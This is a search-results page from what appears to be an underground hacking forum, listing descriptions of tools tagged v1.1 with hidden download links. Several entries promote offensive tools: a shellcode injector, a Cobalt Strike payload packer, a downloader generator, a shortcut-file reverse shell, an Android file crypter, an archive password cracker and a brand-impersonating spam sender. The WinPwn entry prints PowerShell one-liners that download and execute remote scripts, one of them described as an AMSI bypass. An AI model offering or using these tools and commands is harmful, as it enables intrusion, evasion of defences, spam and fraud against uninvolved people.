Jump to content

Search the Community

Showing results for tags 'v1.1'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


  • Staff Control
    • Staff Announcements
    • Moderators
    • Staff
    • Administration
  • General doubts | News
    • General doubts
    • News
  • Hacking | Remote Administration | Bugs & Exploits
    • Hacking
    • Remote Administration
    • Bugs & Exploits
  • Programming | Web | SEO | Prefabricated applications
    • General Programming
    • Web Programming
    • Prefabricated Applications
    • SEO
  • Pentesting Zone
    • Pentesting Accounts
    • Reverse Engineering
  • Security & Anonymity
    • Security
    • Wireless Security
    • Web Security
    • Anonymity
  • Operating Systems | Hardware | Programs
    • Operating systems
    • Hardware
    • PC programs
    • iOS
    • Android
    • Windows Phone
  • Graphic Design
    • Graphic Design
  • vBCms Comments
  • live stream tv
    • live stream tv
  • Marketplace
    • Sell
    • Services
    • Request
  • Pentesting Premium
    • Pentesting Accounts
  • Modders Section
    • Source Codes
    • Manuals | Videos
    • Tools
    • Others
  • PRIV8-Section
    • Exploits
    • Accounts|Dumps
    • Crypter|Binder|Bots
    • Tutorials|Videos
    • Cracked Tools
    • Make Money
    • More Tools
    • Databeses
    • Ebooks
  • Pentesting Zone PRIV8
    • Pentesting Accounts
    • Reverse Engineering
    • Cracker Preview Area
  • Carding Zone PRIV8
    • Carding
    • Phishing
    • Defacing
    • Doxing
    • Special User Premium Preview Area
  • Recycle Bin
    • Recycle
  • Null3D's Nulled Group

Find results in...

Find results that contain...

Date Created

  • Start


Last Updated

  • Start


Filter by number of...


  • Start



About Me










  1. Converts PE so that it can be then injected just like a normal shellcode. (At the same time, the output file remains to be a valid PE). Supports both 32 and 64-bit PEs Objective: The goal of this project is to provide a possibility to generate PE files that can be injected with minimal effort. It is inspired by Stephen Fewer’s ReflectiveDLLInjection – but the difference is that with pe2shc you can add the reflective loading stub post-compilation. Also, the header of the PE file is modified in such a way, that you can start executing the injected buffer from the very beginning – just like you would do with a shellcode. It will automatically find the stub and continue loading the full PE. Changelog v1.1 BUGFIX Stub cleanup: do not clobber RBX/EBX registers REFACT Removed some useless instructions from 32 bit stub Small cleanup in the loader v2 The package contains: pe2shc.exe – PE to shellcode converter (supports both 32 and 64 bit PEs) a utility to run/test shellcode (loads and deploys): runshc32.exe – for 32-bit shellcodes runshc64.exe – for 64-bit shellcodes a utility to inject shellcode into a given process: injector32.exe – for 32-bit shellcodes injector64.exe – for 64-bit shellcodes [hide][Hidden Content]]
  2. GUI de Andryha197 (PepeMan) para Hash Manager de InsidePro. (La única GUI para HM - No he encontrado ninguna otra). Mi GUI puede: - Determinar el número de subprocesos de CPU - Ejecutar el descifrado hash desde el búfer - Especificar la fecha y hora del resultado - Cerrar / dejar el registro abierto después del descifrado - Recordar la configuración básica [hide][Hidden Content]]
  3. Pentest Collaboration Framework Pentest Collaboration Framework – an open-source, cross-platform, and portable toolkit for automating routine processes when carrying out various works for testing! Features Structure Teams Work team Personal team ⛑ Pentest projects Hosts ip-address hostnames operation system open ports tester notes Issues Proof of concept Networks Found credentials Notes Chats Report generation plaintext docx zip Files 🛠 Tools Changelog v1.1 Fixed CSRF problems with notes edition Icons bug Bug with mounted filesystems Bug with issue hosts selection x2 Bug with requirements_unix.txt Bug with session/CSRF timeline Several SQL bugs IPv6 addresses bug Issue styles bug Database thread-locks (SQLite3 only) Issue templates button bug Added Double click host copy at creds/network/issue pages Contribution topic Config session_lifetime & csrf_lifetime params Issue interactive metrics tab with CVSS & OWASP Risk format_date template functions New structure of template functions DNSrecon integration theHarvester integration Metasploit integration Nuclei integration Notes variables for report templates [Hidden Content]
  4. The program can generate executable files with different extensions that can download and run files from the Internet. Added .lnk and .pif extensions support [hide][Hidden Content]]
  5. The context (Right Click) menu in Windows 11 is redesigned and kept with limited entries when compared to old windows . It includes a row of icons for basic actions like copy, paste, and delete, but hides some functionality you might want behind a ‘Show More Options’ button this mean Every time we need to press an extra option to see all the context menu options. We will make a brief assessment of the cost to the world of the “show more” option that Microsoft added to the Windows 11 desktop context menu. Ergonomics is important because, Implementing ergonomic solutions can help trim operating expenses by reducing costs and improving productivity. Imagine a workplace where 10 people work, each computer user clicks on the desktop 100 times a day, each click wastes an extra 1 second. 10 x 100 = 1000 seconds (16,67 Minutes) a day Lost. 30 x 1000 = 30000 seconds ( 500 Minutes = 8,33 Hours) a Month Lost. Even in a workplace with only 10 employees, it causes loss of 8.33 hours per month. Consider the waste of time in the workplace where 100 people work. Windows 11 Classic Context Menu v1.1 – (Thursday, 11 November 2021) [Added] – All user support (Choose Menu – Apply to all users) [Added] – Language support [Added] – Move the Taskbar to the Top (Under menu) [Added] – Some code improvements [hide][Hidden Content]]
  6. RapidScan – The Multi-Tool Web Vulnerability Scanner It is quite a fuss for a pentester to perform binge-tool-scanning (running security scanning tools one after the other) sans automation. Unless you are a pro at automating stuff, it is a herculean task to perform binge-scan for each and every engagement. The ultimate goal of this program is to solve this problem through automation; viz. running multiple scanning tools to discover vulnerabilities, effectively judge false-positives, collectively correlate results and saves precious time; all these under one roof. Features one-step installation. executes a multitude of security scanning tools, does other custom coded checks and prints the results spontaneously. some of the tools include nmap, dnsrecon, wafw00f, uniscan, sslyze, fierce, lbd, theharvester, dnswalk, golismeroetc executes under one entity. saves a lot of time, indeed a lot of time!. checks for same vulnerabilities with multiple tools to help you zero-in on false positives effectively. legends to help you understand which tests may take longer time, so you can Ctrl+C to skip if needed. vulnerability definitions guide you what the vulnerability actually is and the threat it can pose. (under development) remediations tell you how to plug/fix the found vulnerability. (under development) executive summary gives you an overall context of the scan performed with critical, high, low and informational issues discovered. (under development) artificial intelligence to deploy tools automatically depending upon the issues found. for eg; automates the launch of wpscan and plecost tools when a wordpress installation is found. (under development) Vulnerability Checks DNS/HTTP Load Balancers & Web Application Firewalls. Checks for Joomla, WordPress, and Drupal SSL related Vulnerabilities (HEARTBLEED, FREAK, POODLE, CCS Injection, LOGJAM, OCSP Stapling). Commonly Opened Ports. DNS Zone Transfers using multiple tools (Fierce, DNSWalk, DNSRecon, DNSEnum). Sub-Domains Brute Forcing. Open Directory/File Brute Forcing. Shallow XSS, SQLi, and BSQLi Banners. Slow-Loris DoS Attack, LFI (Local File Inclusion), RFI (Remote File Inclusion) & RCE (Remote Code Execution). & more coming up… [hide][Hidden Content]]
  7. This is a RAM cleaner. There are times when programs do not release the memory they used, making the machine slow, but you don’t want to restart the system to get the used memory back. This is where you use Windows Memory Cleaner to clean your memory, so you can carry on working without wasting time restarting your Windows. [Hidden Content]
  8. Beaconator Beaconator is an aggressor script for Cobalt Strike used to generate a raw stageless shellcode and packing the generated shellcode using PEzor. Changelog v1.1 Fixed error check with the use of x86 arch & syscalls Fixed the “null value error” due to missing output folder Fixed issue with options persisting to subsequent payload generations Added PEzor’s BOF format Added the -cleanup option for BOFs Added the -sleep option Added more error checks Cleaned up the code [hide][Hidden Content]]
  9. SniperPhish is a phishing toolkit for pentester or security professionals to enhance user awareness by simulating real-world phishing attacks. SniperPhish helps to combine both phishing emails and phishing websites you created to centrally track user actions. The tool is designed in a view of performing professional phishing exercises and would be reminded to take prior permission from the targeted organization to avoid legal implications. Main Features Web tracker code generation – track your website visits and form submissions independently Create and schedule Phishing mail campaigns Combine your phishing site with an email campaign for centrally tracking An independent “Simple Tracker” module for quick tracking an email or web page visit Advance report generation – generate reports based on the tracking data you needed Custom tracker images and dynamic QR codes in messages Track phishing message replies [hide][Hidden Content]]
  10. 3klCon Project Full Automation Recon tool which works with Small and Medium scopes. Recommended to use it on VPS machine, it’ll discover secrets and searching for vulnerabilities. Tools used Subfinder Assetfinder Altdns Dirsearch Httpx Waybackurls Gau Git-hound Gitdorks.sh Naabu Gf Gf-templates Nuclei Nuclei-templets Subjack Port_scan.sh Changelog v1.1 Editing the tool’s methodology, you can check it there:”” Editing the selected tools, change some, and use more tools Upgrading to python3 Editing some processes to be as a user option like directory bruteforcing and port scan [hide][Hidden Content]]
  11. Osintgram Osintgram is a tool for OSINT on Instagram. Osintgram is a fork of [Hidden Content] and [Hidden Content]. Changelog v1.1 Enhancements Improved command parser (#86) Improved errors handling (8bd1abc) Add new line when input command is empty (f5211eb) Added new commands to catch phone number of users (#111) Added support for Windows (#100) Bug fixes Fix commands output limit bug (#87) Fix setting target with “.” in username (9082990) Readline installing error (#94 ) [hide][Hidden Content]]
  12. Changelog: - Added config.ini file - Solved Discord RPC bug (you can enable or disable the option) [hide][Hidden Content]]
  13. FinalRecon is a fast and simple python script for web reconnaissance. It follows a modular structure so in future new modules can be added with ease. Features FinalRecon provides detailed information such as : Header Information Whois SSL Certificate Information Crawler DNS Enumeration A, AAAA, ANY, CNAME, MX, NS, SOA, TXT Records DMARC Records Subdomain Enumeration Data Sources BuffOver crt.sh ThreatCrowd AnubisDB ThreatMiner Traceroute Protocols UDP TCP ICMP Directory Searching Port Scan Fast Top 1000 Ports Open Ports with Standard Services Export Formats txt xml csv Changelog v1.1.0 root is not required, other minor changes [hide][Hidden Content]]
  14. [hide][Hidden Content]]
  15. capa detects capabilities in executable files. You run it against a PE file or shellcode and it tells you what it thinks the program can do. For example, it might suggest that the file is a backdoor, is capable of installing services, or relies on HTTP to communicate. Changelog v1.1 RC1 draft release to test and verify automated builds. [hide][Hidden Content]]
  16. Brutezip v1.1 Crack compress files: ZIP, RAR, 7z [HIDE][Hidden Content]]
  17. CryDroid v1.1 Android Crypter/Decrypter source code for researchers. Features: Encryption extensions: txt, png, bmp, jpg, mp3, mp4, mpeg, doc, docx, etc (edit app/crypter.part3 to add more) Encrypter/Decrypter using Custom Password [HIDE][Hidden Content]]
  18. DWARF Aka my wip gui for android reverse engineers and crackers. Built on top of pyqt5 (compatible with all os’s), Frida and some terrible code. Features Quick spawn, inject and sleep at application onCreate Hook natives, java and loading modules cycle before initializations Hooks conditions and js script logic Manipulate memory and arguments Memory and disasm view (Powered by capstone) Switch between hooks on different threads Inputs are evaluated. Frida js api and dwarf shortcuts are usable in almost any input field Variables creation Save and load back hooks and variables [HIDE][Hidden Content]]
  19. Read the license before using any part from this code Reverse Shell in Shortcut File (.lnk) How it works? Shortcut file (Microsoft Windows 9.x) LNK is a file extension for a shortcut file used by Microsoft Windows to point to an executable file. LNK stands for LiNK. Shortcut files are used as a direct link to an executable file, instead of having to navigate to the executable. LNK files contain some basic properties, such as the path to the executable file and the “Start-In” directory. LNK files use a curled arrow to indicate they are shortcuts, and the file extension is hidden (even after disabling “Hide Extensions for Known File Types” in Windows Explorer). The script creates a .lnk file that points to the user's "cmd.exe" file (located in the default folder C:\Windows\System32\cmd.exe) to run a reverse shell through arguments. Features: Reverse TCP Port Forwarding using Ngrok.io [HIDE][Hidden Content]]
  20. What’s PAKURI Sometimes, penetration testers love to perform a complicated job. However, I always prefer the easy way. PAKURI is a semi-automated user-friendly penetration testing tool framework. You can run the popular pentest tools using only the numeric keypad, just like a game. It is also a good entry tool for beginners. They can use PAKURI to learn the flow to penetration testing without struggling with a confusing command line/tools. Abilities of “PAKURI”. Intelligence gathering. Vulnerability analysis. Visualize. Brute Force Attack. Exploitation. For beginner: (d) PAKURI has been created to support the early stages of penetration testing. These can be achieved with what is included in Kali-Tools. It can be useful for training the entry level pentesters. NOTE If you are interested, please use them in an environment under your control and at your own risk. And, if you execute the PAKURI on systems that are not under your control, it may be considered an attack and you may have legal liability for your action. Features Scan enum4linux Nikto Nmap OpenVAS Skipfish sslscan SSLyze Exploit BruteSpray Metasploit Visualize Faraday CUI-GUI switching PAKURI can be operated with CUI and does not require a high-spec machine, so it can be operated with Raspberry Pi. [HIDE][Hidden Content]]
  21. [HIDE][Hidden Content]]
  22. jadx - Dex to Java decompiler Command line and GUI tools for produce Java source code from Android Dex and Apk files Main features: decompile Dalvik bytecode to java classes from APK, dex, aar and zip files decode AndroidManifest.xml and other resources from resources.arsc deobfuscator included jadx-gui features: view decompiled code with highlighted syntax jump to declaration find usage full text search [HIDE][Hidden Content]]
  23. Automation for internal Windows Penetration Testing. 1) Automatic Proxy Detection 2) Elevated or unelevated Detection 3) Forensic Mode oder Pentest Mode a. Forensik -> Loki + PSRECON + Todo: Threathunting functions b. Pentest -> Internal Windows Domain System i. Inveigh NBNS/SMB/HTTPS Spoofing ii. Local Reconing -> Hostenum, SessionGopher, FileSearch, PSRecon iii. Domain Reconing -> GetExploitableSystems, Powerview functions, ACL-Analysis, ADRecon 1) Todo: Grouper for Group Policy overview iv. Privilege Escalation -> Powersploit (Allchecks), GPP-Passwords, MS-Exploit Search (Sherlock), WCMDump, JAWS v. Lazagne Password recovery vi. Exploitation -> Kerberoasting, Mimikittenz, Mimikatz with Admin-rights vii. LateralMovement -> FindLocalAdminAccess 1) Invoke-MassMimikatz || Powershell Empire Remote Launcher Execution over WMI 2) DomainPasswordspray viii. Share Enumeration ix. FindGPOLocation –> Search for user/group rights x. Find-Fruit Changelog v1.1 This version contains mainly new features. The execution of various C# binaries in memory, GPO audit functions, various new local recon checks, and domain checks. Just Import the Modules with: Import-Module .\WinPwn.ps1 or iex (new-object net.webclient).downloadstring(‘[Hidden Content]) For AMSI Bypass use the following oneliner: iex (new-object net.webclient).downloadstring(‘[Hidden Content]) [HIDE][Hidden Content]]
  24. [HIDE][Hidden Content]]
  25. Free Email SPAM v1.1 is a program that takes advantage of super brands to send spam to user emails. This is the most elitist method of delivery spam online. Free Email SPAM v1.1 - Added Countries: Belgium, Spain, USA, Portugal, United Kingdom, France, Canada, Germany, Italy, Russia, Turkey, Ecuador... Free Email SPAM v1.1 - Added Super Brands Sudinfo, La Vanguardia, GoDaddy, AS, CINM, John Lewis & Partners, RFI, CBC, Huffington Post, Univision, Euronews, Gant, Diesel, Vogue, Cobertura Plus, Dorothy Perkins, Oysho, Calvin Klein, H&M... Note: Reply with your country or super brand that you would like to add. Download: [hide][Hidden Content]] Virustotal: [hide][Hidden Content]]

Chat Room

Chat Room

Chatroom Rules

No support in chat, open a thread.

  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.